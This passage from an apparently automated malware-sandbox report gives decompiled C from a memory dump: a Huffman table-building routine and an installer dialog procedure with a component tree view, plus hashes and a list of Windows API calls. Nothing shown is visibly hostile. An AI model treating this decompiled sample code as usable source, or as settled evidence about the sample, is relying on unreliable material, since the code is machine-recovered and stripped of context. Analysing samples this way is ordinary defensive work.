                                                                            0x00406c5f
                                                                            0x00406c62
                                                                            0x00406c67

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            Similarity
                                                                            • Opcode ID: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction ID: 3db1d01f4341fbbb805040525b4c18df43ce82c239752998d09602440244d977
                                                                            • Opcode Fuzzy Hash: fbe53aaae7eeab696340878b5eee03eb0fd33fb80e94407ce6853ed186f7d00c
                                                                            • Instruction Fuzzy Hash: FEE18A71A0070ADFCB24CF59D880BAABBF5FB44305F15852EE496A72D1D338AA91CF45
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 100%
                                                                            			E0040755C(signed char _a4, char _a5, short _a6, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int* _a24, signed int _a28, intOrPtr _a32, signed int* _a36) {
                                                                            				signed int _v8;
                                                                            				unsigned int _v12;
                                                                            				signed int _v16;
                                                                            				intOrPtr _v20;
                                                                            				signed int _v24;
                                                                            				signed int _v28;
                                                                            				intOrPtr* _v32;
                                                                            				signed int* _v36;
                                                                            				signed int _v40;
                                                                            				signed int _v44;
                                                                            				intOrPtr _v48;
                                                                            				intOrPtr _v52;
                                                                            				void _v116;
                                                                            				signed int _v176;
                                                                            				signed int _v180;
                                                                            				signed int _v240;
                                                                            				signed int _t166;
                                                                            				signed int _t168;
                                                                            				intOrPtr _t175;
                                                                            				signed int _t181;
                                                                            				void* _t182;
                                                                            				intOrPtr _t183;
                                                                            				signed int* _t184;
                                                                            				signed int _t186;
                                                                            				signed int _t187;
                                                                            				signed int* _t189;
                                                                            				signed int _t190;
                                                                            				intOrPtr* _t191;
                                                                            				intOrPtr _t192;
                                                                            				signed int _t193;
                                                                            				signed int _t195;
                                                                            				signed int _t200;
                                                                            				signed int _t205;
                                                                            				void* _t207;
                                                                            				short _t208;
                                                                            				signed char _t222;
                                                                            				signed int _t224;
                                                                            				signed int _t225;
                                                                            				signed int* _t232;
                                                                            				signed int _t233;
                                                                            				signed int _t234;
                                                                            				void* _t235;
                                                                            				signed int _t236;
                                                                            				signed int _t244;
                                                                            				signed int _t246;
                                                                            				signed int _t251;
                                                                            				signed int _t254;
                                                                            				signed int _t256;
                                                                            				signed int _t259;
                                                                            				signed int _t262;
                                                                            				void* _t263;
                                                                            				void* _t264;
                                                                            				signed int _t267;
                                                                            				intOrPtr _t269;
                                                                            				intOrPtr _t271;
                                                                            				signed int _t274;
                                                                            				intOrPtr* _t275;
                                                                            				unsigned int _t276;
                                                                            				void* _t277;
                                                                            				signed int _t278;
                                                                            				intOrPtr* _t279;
                                                                            				signed int _t281;
                                                                            				intOrPtr _t282;
                                                                            				intOrPtr _t283;
                                                                            				signed int* _t284;
                                                                            				signed int _t286;
                                                                            				signed int _t287;
                                                                            				signed int _t288;
                                                                            				signed int _t296;
                                                                            				signed int* _t297;
                                                                            				intOrPtr _t298;
                                                                            				void* _t299;
                                                                            
                                                                            				_t278 = _a8;
                                                                            				_t187 = 0x10;
                                                                            				memset( &_v116, 0, _t187 << 2);
                                                                            				_t189 = _a4;
                                                                            				_t233 = _t278;
                                                                            				do {
                                                                            					_t166 =  *_t189;
                                                                            					_t189 =  &(_t189[1]);
                                                                            					 *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) =  *((intOrPtr*)(_t299 + _t166 * 4 - 0x70)) + 1;
                                                                            					_t233 = _t233 - 1;
                                                                            				} while (_t233 != 0);
                                                                            				if(_v116 != _t278) {
                                                                            					_t279 = _a28;
                                                                            					_t267 =  *_t279;
                                                                            					_t190 = 1;
                                                                            					_a28 = _t267;
                                                                            					_t234 = 0xf;
                                                                            					while(1) {
                                                                            						_t168 = 0;
                                                                            						if( *((intOrPtr*)(_t299 + _t190 * 4 - 0x70)) != 0) {
                                                                            							break;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						if(_t190 <= _t234) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v8 = _t190;
                                                                            					if(_t267 < _t190) {
                                                                            						_a28 = _t190;
                                                                            					}
                                                                            					while( *((intOrPtr*)(_t299 + _t234 * 4 - 0x70)) == _t168) {
                                                                            						_t234 = _t234 - 1;
                                                                            						if(_t234 != 0) {
                                                                            							continue;
                                                                            						}
                                                                            						break;
                                                                            					}
                                                                            					_v28 = _t234;
                                                                            					if(_a28 > _t234) {
                                                                            						_a28 = _t234;
                                                                            					}
                                                                            					 *_t279 = _a28;
                                                                            					_t181 = 1 << _t190;
                                                                            					while(_t190 < _t234) {
                                                                            						_t182 = _t181 -  *((intOrPtr*)(_t299 + _t190 * 4 - 0x70));
                                                                            						if(_t182 < 0) {
                                                                            							L64:
                                                                            							return _t168 | 0xffffffff;
                                                                            						}
                                                                            						_t190 = _t190 + 1;
                                                                            						_t181 = _t182 + _t182;
                                                                            					}
                                                                            					_t281 = _t234 << 2;
                                                                            					_t191 = _t299 + _t281 - 0x70;
                                                                            					_t269 =  *_t191;
                                                                            					_t183 = _t181 - _t269;
                                                                            					_v52 = _t183;
                                                                            					if(_t183 < 0) {
                                                                            						goto L64;
                                                                            					}
                                                                            					_v176 = _t168;
                                                                            					 *_t191 = _t269 + _t183;
                                                                            					_t192 = 0;
                                                                            					_t235 = _t234 - 1;
                                                                            					if(_t235 == 0) {
                                                                            						L21:
                                                                            						_t184 = _a4;
                                                                            						_t271 = 0;
                                                                            						do {
                                                                            							_t193 =  *_t184;
                                                                            							_t184 =  &(_t184[1]);
                                                                            							if(_t193 != _t168) {
                                                                            								_t232 = _t299 + _t193 * 4 - 0xb0;
                                                                            								_t236 =  *_t232;
                                                                            								 *((intOrPtr*)(0x432190 + _t236 * 4)) = _t271;
                                                                            								 *_t232 = _t236 + 1;
                                                                            							}
                                                                            							_t271 = _t271 + 1;
                                                                            						} while (_t271 < _a8);
                                                                            						_v16 = _v16 | 0xffffffff;
                                                                            						_v40 = _v40 & 0x00000000;
                                                                            						_a8 =  *((intOrPtr*)(_t299 + _t281 - 0xb0));
                                                                            						_t195 = _v8;
                                                                            						_t186 =  ~_a28;
                                                                            						_v12 = _t168;
                                                                            						_v180 = _t168;
                                                                            						_v36 = 0x432190;
                                                                            						_v240 = _t168;
                                                                            						if(_t195 > _v28) {
                                                                            							L62:
                                                                            							_t168 = 0;
                                                                            							if(_v52 == 0 || _v28 == 1) {
                                                                            								return _t168;
                                                                            							} else {
                                                                            								goto L64;
                                                                            							}
                                                                            						}
                                                                            						_v44 = _t195 - 1;
                                                                            						_v32 = _t299 + _t195 * 4 - 0x70;
                                                                            						do {
                                                                            							_t282 =  *_v32;
                                                                            							if(_t282 == 0) {
                                                                            								goto L61;
                                                                            							}
                                                                            							while(1) {
                                                                            								_t283 = _t282 - 1;
                                                                            								_t200 = _a28 + _t186;
                                                                            								_v48 = _t283;
                                                                            								_v24 = _t200;
                                                                            								if(_v8 <= _t200) {
                                                                            									goto L45;
                                                                            								}
                                                                            								L31:
                                                                            								_v20 = _t283 + 1;
                                                                            								do {
                                                                            									_v16 = _v16 + 1;
                                                                            									_t296 = _v28 - _v24;
                                                                            									if(_t296 > _a28) {
                                                                            										_t296 = _a28;
                                                                            									}
                                                                            									_t222 = _v8 - _v24;
                                                                            									_t254 = 1 << _t222;
                                                                            									if(1 <= _v20) {
                                                                            										L40:
                                                                            										_t256 =  *_a36;
                                                                            										_t168 = 1 << _t222;
                                                                            										_v40 = 1;
                                                                            										_t274 = _t256 + 1;
                                                                            										if(_t274 > 0x5a0) {
                                                                            											goto L64;
                                                                            										}
                                                                            									} else {
                                                                            										_t275 = _v32;
                                                                            										_t263 = _t254 + (_t168 | 0xffffffff) - _v48;
                                                                            										if(_t222 >= _t296) {
                                                                            											goto L40;
                                                                            										}
                                                                            										while(1) {
                                                                            											_t222 = _t222 + 1;
                                                                            											if(_t222 >= _t296) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t275 = _t275 + 4;
                                                                            											_t264 = _t263 + _t263;
                                                                            											_t175 =  *_t275;
                                                                            											if(_t264 <= _t175) {
                                                                            												goto L40;
                                                                            											}
                                                                            											_t263 = _t264 - _t175;
                                                                            										}
                                                                            										goto L40;
                                                                            									}
                                                                            									_t168 = _a32 + _t256 * 4;
                                                                            									_t297 = _t299 + _v16 * 4 - 0xec;
                                                                            									 *_a36 = _t274;
                                                                            									_t259 = _v16;
                                                                            									 *_t297 = _t168;
                                                                            									if(_t259 == 0) {
                                                                            										 *_a24 = _t168;
                                                                            									} else {
                                                                            										_t276 = _v12;
                                                                            										_t298 =  *((intOrPtr*)(_t297 - 4));
                                                                            										 *(_t299 + _t259 * 4 - 0xb0) = _t276;
                                                                            										_a5 = _a28;
                                                                            										_a4 = _t222;
                                                                            										_t262 = _t276 >> _t186;
                                                                            										_a6 = (_t168 - _t298 >> 2) - _t262;
                                                                            										 *(_t298 + _t262 * 4) = _a4;
                                                                            									}
                                                                            									_t224 = _v24;
                                                                            									_t186 = _t224;
                                                                            									_t225 = _t224 + _a28;
                                                                            									_v24 = _t225;
                                                                            								} while (_v8 > _t225);
                                                                            								L45:
                                                                            								_t284 = _v36;
                                                                            								_a5 = _v8 - _t186;
                                                                            								if(_t284 < 0x432190 + _a8 * 4) {
                                                                            									_t205 =  *_t284;
                                                                            									if(_t205 >= _a12) {
                                                                            										_t207 = _t205 - _a12 + _t205 - _a12;
                                                                            										_v36 =  &(_v36[1]);
                                                                            										_a4 =  *((intOrPtr*)(_t207 + _a20)) + 0x50;
                                                                            										_t208 =  *((intOrPtr*)(_t207 + _a16));
                                                                            									} else {
                                                                            										_a4 = (_t205 & 0xffffff00 | _t205 - 0x00000100 > 0x00000000) - 0x00000001 & 0x00000060;
                                                                            										_t208 =  *_t284;
                                                                            										_v36 =  &(_t284[1]);
                                                                            									}
                                                                            									_a6 = _t208;
                                                                            								} else {
                                                                            									_a4 = 0xc0;
                                                                            								}
                                                                            								_t286 = 1 << _v8 - _t186;
                                                                            								_t244 = _v12 >> _t186;
                                                                            								while(_t244 < _v40) {
                                                                            									 *(_t168 + _t244 * 4) = _a4;
                                                                            									_t244 = _t244 + _t286;
                                                                            								}
                                                                            								_t287 = _v12;
                                                                            								_t246 = 1 << _v44;
                                                                            								while((_t287 & _t246) != 0) {
                                                                            									_t287 = _t287 ^ _t246;
                                                                            									_t246 = _t246 >> 1;
                                                                            								}
                                                                            								_t288 = _t287 ^ _t246;
                                                                            								_v20 = 1;
                                                                            								_v12 = _t288;
                                                                            								_t251 = _v16;
                                                                            								if(((1 << _t186) - 0x00000001 & _t288) ==  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0))) {
                                                                            									L60:
                                                                            									if(_v48 != 0) {
                                                                            										_t282 = _v48;
                                                                            										_t283 = _t282 - 1;
                                                                            										_t200 = _a28 + _t186;
                                                                            										_v48 = _t283;
                                                                            										_v24 = _t200;
                                                                            										if(_v8 <= _t200) {
                                                                            											goto L45;
                                                                            										}
                                                                            										goto L31;
                                                                            									}
                                                                            									break;
                                                                            								} else {
                                                                            									goto L58;
                                                                            								}
                                                                            								do {
                                                                            									L58:
                                                                            									_t186 = _t186 - _a28;
                                                                            									_t251 = _t251 - 1;
                                                                            								} while (((1 << _t186) - 0x00000001 & _v12) !=  *((intOrPtr*)(_t299 + _t251 * 4 - 0xb0)));
                                                                            								_v16 = _t251;
                                                                            								goto L60;
                                                                            							}
                                                                            							L61:
                                                                            							_v8 = _v8 + 1;
                                                                            							_v32 = _v32 + 4;
                                                                            							_v44 = _v44 + 1;
                                                                            						} while (_v8 <= _v28);
                                                                            						goto L62;
                                                                            					}
                                                                            					_t277 = 0;
                                                                            					do {
                                                                            						_t192 = _t192 +  *((intOrPtr*)(_t299 + _t277 - 0x6c));
                                                                            						_t277 = _t277 + 4;
                                                                            						_t235 = _t235 - 1;
                                                                            						 *((intOrPtr*)(_t299 + _t277 - 0xac)) = _t192;
                                                                            					} while (_t235 != 0);
                                                                            					goto L21;
                                                                            				}
                                                                            				 *_a24 =  *_a24 & 0x00000000;
                                                                            				 *_a28 =  *_a28 & 0x00000000;
                                                                            				return 0;
                                                                            			}

                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction ID: 4d3fc1c80ea15bf86cc2801d6424e98614acddb7a54358772128df9d71e60e61
                                                                            • Opcode Fuzzy Hash: ad3a06017d63110f505e6ee1591874ec5e375aadb040ddd80f083a0c788ff2d1
                                                                            • Instruction Fuzzy Hash: C6C14871E042599BCF18CF68C8905EEBBB2BF88314F25866AD85677380D7347941CF95
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 96%
                                                                            			E00404F06(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                                            				struct HWND__* _v8;
                                                                            				struct HWND__* _v12;
                                                                            				long _v16;
                                                                            				signed int _v20;
                                                                            				signed int _v24;
                                                                            				intOrPtr _v28;
                                                                            				signed char* _v32;
                                                                            				int _v36;
                                                                            				signed int _v44;
                                                                            				int _v48;
                                                                            				signed int* _v60;
                                                                            				signed char* _v64;
                                                                            				signed int _v68;
                                                                            				long _v72;
                                                                            				void* _v76;
                                                                            				intOrPtr _v80;
                                                                            				intOrPtr _v84;
                                                                            				void* _v88;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				signed int _t198;
                                                                            				intOrPtr _t201;
                                                                            				long _t207;
                                                                            				signed int _t211;
                                                                            				signed int _t222;
                                                                            				void* _t225;
                                                                            				void* _t226;
                                                                            				int _t232;
                                                                            				long _t237;
                                                                            				long _t238;
                                                                            				signed int _t239;
                                                                            				signed int _t245;
                                                                            				signed int _t247;
                                                                            				signed char _t248;
                                                                            				signed char _t254;
                                                                            				void* _t258;
                                                                            				void* _t260;
                                                                            				signed char* _t278;
                                                                            				signed char _t279;
                                                                            				long _t284;
                                                                            				struct HWND__* _t291;
                                                                            				signed int* _t292;
                                                                            				int _t293;
                                                                            				long _t294;
                                                                            				signed int _t295;
                                                                            				void* _t297;
                                                                            				long _t298;
                                                                            				int _t299;
                                                                            				signed int _t300;
                                                                            				signed int _t303;
                                                                            				signed int _t311;
                                                                            				signed char* _t319;
                                                                            				int _t324;
                                                                            				void* _t326;
                                                                            
                                                                            				_t291 = _a4;
                                                                            				_v12 = GetDlgItem(_t291, 0x3f9);
                                                                            				_v8 = GetDlgItem(_t291, 0x408);
                                                                            				_t326 = SendMessageW;
                                                                            				_v24 =  *0x434f28;
                                                                            				_v28 =  *0x434f10 + 0x94;
                                                                            				if(_a8 != 0x110) {
                                                                            					L23:
                                                                            					if(_a8 != 0x405) {
                                                                            						_t301 = _a16;
                                                                            					} else {
                                                                            						_a12 = 0;
                                                                            						_t301 = 1;
                                                                            						_a8 = 0x40f;
                                                                            						_a16 = 1;
                                                                            					}
                                                                            					if(_a8 == 0x4e || _a8 == 0x413) {
                                                                            						_v16 = _t301;
                                                                            						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                                                                            							if(( *0x434f19 & 0x00000002) != 0) {
                                                                            								L41:
                                                                            								if(_v16 != 0) {
                                                                            									_t237 = _v16;
                                                                            									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                                                                            										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                                                                            									}
                                                                            									_t238 = _v16;
                                                                            									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                                                                            										_t301 = _v24;
                                                                            										_t239 =  *(_t238 + 0x5c);
                                                                            										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                                                                            										} else {
                                                                            											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								goto L48;
                                                                            							}
                                                                            							if(_a8 == 0x413) {
                                                                            								L33:
                                                                            								_t301 = 0 | _a8 != 0x00000413;
                                                                            								_t245 = E00404E54(_v8, _a8 != 0x413);
                                                                            								_t295 = _t245;
                                                                            								if(_t295 >= 0) {
                                                                            									_t94 = _v24 + 8; // 0x8
                                                                            									_t301 = _t245 * 0x818 + _t94;
                                                                            									_t247 =  *_t301;
                                                                            									if((_t247 & 0x00000010) == 0) {
                                                                            										if((_t247 & 0x00000040) == 0) {
                                                                            											_t248 = _t247 ^ 0x00000001;
                                                                            										} else {
                                                                            											_t254 = _t247 ^ 0x00000080;
                                                                            											if(_t254 >= 0) {
                                                                            												_t248 = _t254 & 0x000000fe;
                                                                            											} else {
                                                                            												_t248 = _t254 | 0x00000001;
                                                                            											}
                                                                            										}
                                                                            										 *_t301 = _t248;
                                                                            										E0040117D(_t295);
                                                                            										_a12 = _t295 + 1;
                                                                            										_a16 =  !( *0x434f18) >> 0x00000008 & 0x00000001;
                                                                            										_a8 = 0x40f;
                                                                            									}
                                                                            								}
                                                                            								goto L41;
                                                                            							}
                                                                            							_t301 = _a16;
                                                                            							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                                                                            								goto L41;
                                                                            							}
                                                                            							goto L33;
                                                                            						} else {
                                                                            							goto L48;
                                                                            						}
                                                                            					} else {
                                                                            						L48:
                                                                            						if(_a8 != 0x111) {
                                                                            							L56:
                                                                            							if(_a8 == 0x200) {
                                                                            								SendMessageW(_v8, 0x200, 0, 0);
                                                                            							}
                                                                            							if(_a8 == 0x40b) {
                                                                            								_t225 =  *0x42d24c;
                                                                            								if(_t225 != 0) {
                                                                            									ImageList_Destroy(_t225);
                                                                            								}
                                                                            								_t226 =  *0x42d260;
                                                                            								if(_t226 != 0) {
                                                                            									GlobalFree(_t226);
                                                                            								}
                                                                            								 *0x42d24c = 0;
                                                                            								 *0x42d260 = 0;
                                                                            								 *0x434f60 = 0;
                                                                            							}
                                                                            							if(_a8 != 0x40f) {
                                                                            								L90:
                                                                            								if(_a8 == 0x420 && ( *0x434f19 & 0x00000001) != 0) {
                                                                            									_t324 = (0 | _a16 == 0x00000020) << 3;
                                                                            									ShowWindow(_v8, _t324);
                                                                            									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
                                                                            								}
                                                                            								goto L93;
                                                                            							} else {
                                                                            								E004011EF(_t301, 0, 0);
                                                                            								_t198 = _a12;
                                                                            								if(_t198 != 0) {
                                                                            									if(_t198 != 0xffffffff) {
                                                                            										_t198 = _t198 - 1;
                                                                            									}
                                                                            									_push(_t198);
                                                                            									_push(8);
                                                                            									E00404ED4();
                                                                            								}
                                                                            								if(_a16 == 0) {
                                                                            									L75:
                                                                            									E004011EF(_t301, 0, 0);
                                                                            									_v36 =  *0x42d260;
                                                                            									_t201 =  *0x434f28;
                                                                            									_v64 = 0xf030;
                                                                            									_v24 = 0;
                                                                            									if( *0x434f2c <= 0) {
                                                                            										L86:
                                                                            										if( *0x434fbe == 0x400) {
                                                                            											InvalidateRect(_v8, 0, 1);
                                                                            										}
                                                                            										if( *((intOrPtr*)( *0x433edc + 0x10)) != 0) {
                                                                            											E00404E0F(0x3ff, 0xfffffffb, E00404E27(5));
                                                                            										}
                                                                            										goto L90;
                                                                            									}
                                                                            									_t292 = _t201 + 8;
                                                                            									do {
                                                                            										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
                                                                            										if(_t207 != 0) {
                                                                            											_t303 =  *_t292;
                                                                            											_v72 = _t207;
                                                                            											_v76 = 8;
                                                                            											if((_t303 & 0x00000001) != 0) {
                                                                            												_v76 = 9;
                                                                            												_v60 =  &(_t292[4]);
                                                                            												_t292[0] = _t292[0] & 0x000000fe;
                                                                            											}
                                                                            											if((_t303 & 0x00000040) == 0) {
                                                                            												_t211 = (_t303 & 0x00000001) + 1;
                                                                            												if((_t303 & 0x00000010) != 0) {
                                                                            													_t211 = _t211 + 3;
                                                                            												}
                                                                            											} else {
                                                                            												_t211 = 3;
                                                                            											}
                                                                            											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
                                                                            											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
                                                                            											SendMessageW(_v8, 0x113f, 0,  &_v76);
                                                                            										}
                                                                            										_v24 = _v24 + 1;
                                                                            										_t292 =  &(_t292[0x206]);
                                                                            									} while (_v24 <  *0x434f2c);
                                                                            									goto L86;
                                                                            								} else {
                                                                            									_t293 = E004012E2( *0x42d260);
                                                                            									E00401299(_t293);
                                                                            									_t222 = 0;
                                                                            									_t301 = 0;
                                                                            									if(_t293 <= 0) {
                                                                            										L74:
                                                                            										SendMessageW(_v12, 0x14e, _t301, 0);
                                                                            										_a16 = _t293;
                                                                            										_a8 = 0x420;
                                                                            										goto L75;
                                                                            									} else {
                                                                            										goto L71;
                                                                            									}
                                                                            									do {
                                                                            										L71:
                                                                            										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
                                                                            											_t301 = _t301 + 1;
                                                                            										}
                                                                            										_t222 = _t222 + 1;
                                                                            									} while (_t222 < _t293);
                                                                            									goto L74;
                                                                            								}
                                                                            							}
                                                                            						}
                                                                            						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
                                                                            							goto L93;
                                                                            						} else {
                                                                            							_t232 = SendMessageW(_v12, 0x147, 0, 0);
                                                                            							if(_t232 == 0xffffffff) {
                                                                            								goto L93;
                                                                            							}
                                                                            							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
                                                                            							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
                                                                            								_t294 = 0x20;
                                                                            							}
                                                                            							E00401299(_t294);
                                                                            							SendMessageW(_a4, 0x420, 0, _t294);
                                                                            							_a12 = _a12 | 0xffffffff;
                                                                            							_a16 = 0;
                                                                            							_a8 = 0x40f;
                                                                            							goto L56;
                                                                            						}
                                                                            					}
                                                                            				} else {
                                                                            					_v36 = 0;
                                                                            					_v20 = 2;
                                                                            					 *0x434f60 = _t291;
                                                                            					 *0x42d260 = GlobalAlloc(0x40,  *0x434f2c << 2);
                                                                            					_t258 = LoadImageW( *0x434f00, 0x6e, 0, 0, 0, 0);
                                                                            					 *0x42d254 =  *0x42d254 | 0xffffffff;
                                                                            					_t297 = _t258;
                                                                            					 *0x42d25c = SetWindowLongW(_v8, 0xfffffffc, E00405513);
                                                                            					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
                                                                            					 *0x42d24c = _t260;
                                                                            					ImageList_AddMasked(_t260, _t297, 0xff00ff);
                                                                            					SendMessageW(_v8, 0x1109, 2,  *0x42d24c);
                                                                            					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
                                                                            						SendMessageW(_v8, 0x111b, 0x10, 0);
                                                                            					}
                                                                            					DeleteObject(_t297);
                                                                            					_t298 = 0;
                                                                            					do {
                                                                            						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
                                                                            						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
                                                                            							if(_t298 != 0x20) {
                                                                            								_v20 = 0;
                                                                            							}
                                                                            							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E0040657A(_t298, 0, _t326, 0, _t266)), _t298);
                                                                            						}
                                                                            						_t298 = _t298 + 1;
                                                                            					} while (_t298 < 0x21);
                                                                            					_t299 = _a16;
                                                                            					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
                                                                            					_push(0x15);
                                                                            					E00404499(_a4);
                                                                            					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
                                                                            					_push(0x16);
                                                                            					E00404499(_a4);
                                                                            					_t300 = 0;
                                                                            					_v16 = 0;
                                                                            					if( *0x434f2c <= 0) {
                                                                            						L19:
                                                                            						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
                                                                            						goto L20;
                                                                            					} else {
                                                                            						_t319 = _v24 + 8;
                                                                            						_v32 = _t319;
                                                                            						do {
                                                                            							_t278 =  &(_t319[0x10]);
                                                                            							if( *_t278 != 0) {
                                                                            								_v64 = _t278;
                                                                            								_t279 =  *_t319;
                                                                            								_v88 = _v16;
                                                                            								_t311 = 0x20;
                                                                            								_v84 = 0xffff0002;
                                                                            								_v80 = 0xd;
                                                                            								_v68 = _t311;
                                                                            								_v44 = _t300;
                                                                            								_v72 = _t279 & _t311;
                                                                            								if((_t279 & 0x00000002) == 0) {
                                                                            									if((_t279 & 0x00000004) == 0) {
                                                                            										 *( *0x42d260 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                            									} else {
                                                                            										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
                                                                            									}
                                                                            								} else {
                                                                            									_v80 = 0x4d;
                                                                            									_v48 = 1;
                                                                            									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
                                                                            									_v36 = 1;
                                                                            									 *( *0x42d260 + _t300 * 4) = _t284;
                                                                            									_v16 =  *( *0x42d260 + _t300 * 4);
                                                                            								}
                                                                            							}
                                                                            							_t300 = _t300 + 1;
                                                                            							_t319 =  &(_v32[0x818]);
                                                                            							_v32 = _t319;
                                                                            						} while (_t300 <  *0x434f2c);
                                                                            						if(_v36 != 0) {
                                                                            							L20:
                                                                            							if(_v20 != 0) {
                                                                            								E004044CE(_v8);
                                                                            								goto L23;
                                                                            							} else {
                                                                            								ShowWindow(_v12, 5);
                                                                            								E004044CE(_v12);
                                                                            								L93:
                                                                            								return E00404500(_a8, _a12, _a16);
                                                                            							}
                                                                            						}
                                                                            						goto L19;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003F9), ref: 00404F1E
                                                                            • GetDlgItem.USER32(?,00000408), ref: 00404F29
                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F73
                                                                            • LoadImageW.USER32 ref: 00404F8A
                                                                            • SetWindowLongW.USER32 ref: 00404FA3
                                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404FB7
                                                                            • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404FC9
                                                                            • SendMessageW.USER32(?,00001109,00000002), ref: 00404FDF
                                                                            • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FEB
                                                                            • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FFD
                                                                            • DeleteObject.GDI32(00000000), ref: 00405000
                                                                            • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040502B
                                                                            • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405037
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050D2
                                                                            • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405102
                                                                              • Part of subcall function 004044CE: SendMessageW.USER32(00000028,?,00000001,004042F9), ref: 004044DC
                                                                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405116
                                                                            • GetWindowLongW.USER32(?,000000F0), ref: 00405144
                                                                            • SetWindowLongW.USER32 ref: 00405152
                                                                            • ShowWindow.USER32(?,00000005), ref: 00405162
                                                                            • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040525D
                                                                            • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004052C2
                                                                            • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052D7
                                                                            • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052FB
                                                                            • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040531B
                                                                            • ImageList_Destroy.COMCTL32(?), ref: 00405330
                                                                            • GlobalFree.KERNEL32(?), ref: 00405340
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004053B9
                                                                            • SendMessageW.USER32(?,00001102,?,?), ref: 00405462
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405471
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0040549C
                                                                            • ShowWindow.USER32(?,00000000), ref: 004054EA
                                                                            • GetDlgItem.USER32(?,000003FE), ref: 004054F5
                                                                            • ShowWindow.USER32(00000000), ref: 004054FC
                                                                            Strings
                                                                            Memory Dump Source
